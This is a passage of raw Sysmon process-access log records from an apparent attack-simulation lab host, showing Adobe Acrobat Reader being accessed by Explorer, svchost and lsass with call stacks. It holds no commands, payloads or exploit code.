DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+1b908c(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+12a10(wow64)|C:\Windows\System32\shcore.dll+36766(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+39d29|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+38ca9|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64) 10341000x800000000000000046694Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.340{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+1b9077(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+12a10(wow64)|C:\Windows\System32\shcore.dll+36766(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+39d29 10341000x800000000000000046693Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.340{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+1b9077(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+12a10(wow64)|C:\Windows\System32\shcore.dll+36766(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+39d29|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b 10341000x800000000000000046692Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.340{FE4C2B44-E64A-63C7-8706-00000000AF02}14004668C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9888(wow64)|C:\Windows\System32\KERNELBASE.dll+157bad(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+4cecf|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+35a52|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+12f67|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+1db250|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+1da26f|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+1d903a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+1d7ff6|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+1d2014|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+21d97a|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64) 10341000x800000000000000046691Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.339{FE4C2B44-D9F5-63C7-1200-00000000AF02}7565760C:\Windows\System32\svchost.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046690Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.339{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+1b9159(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+12a10(wow64)|C:\Windows\System32\shcore.dll+36766(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+39d29|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+38ca9|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64) 10341000x800000000000000046689Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.339{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+1b908c(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+12a10(wow64)|C:\Windows\System32\shcore.dll+36766(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+39d29|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+38ca9|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64) 10341000x800000000000000046688Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.339{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+1b9077(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+12a10(wow64)|C:\Windows\System32\shcore.dll+36766(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+39d29 10341000x800000000000000046687Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.339{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+1b9077(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+12a10(wow64)|C:\Windows\System32\shcore.dll+36766(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+39d29|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b 10341000x800000000000000046686Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.338{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+1b9159(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+366c2(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+39c21|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+38ca9|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046685Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.338{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E64A-63C7-8706-00000000AF02}1400C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046684Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.338{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+1b908c(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+366c2(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+39c21|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+38ca9|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046683Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.337{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+1b9077(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+366c2(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+39c21|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b 10341000x800000000000000046682Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.337{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+1b9077(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+366c2(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+39c21|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+38ca9 10341000x800000000000000046681Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.337{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E64A-63C7-8706-00000000AF02}1400C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046680Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.337{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E64A-63C7-8706-00000000AF02}1400C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046679Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.337{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E64A-63C7-8706-00000000AF02}1400C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046678Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.337{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E64A-63C7-8706-00000000AF02}1400C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046677Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.336{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E64A-63C7-8706-00000000AF02}1400C:\Program Files (x86)\Adobe\Acrobat Reader 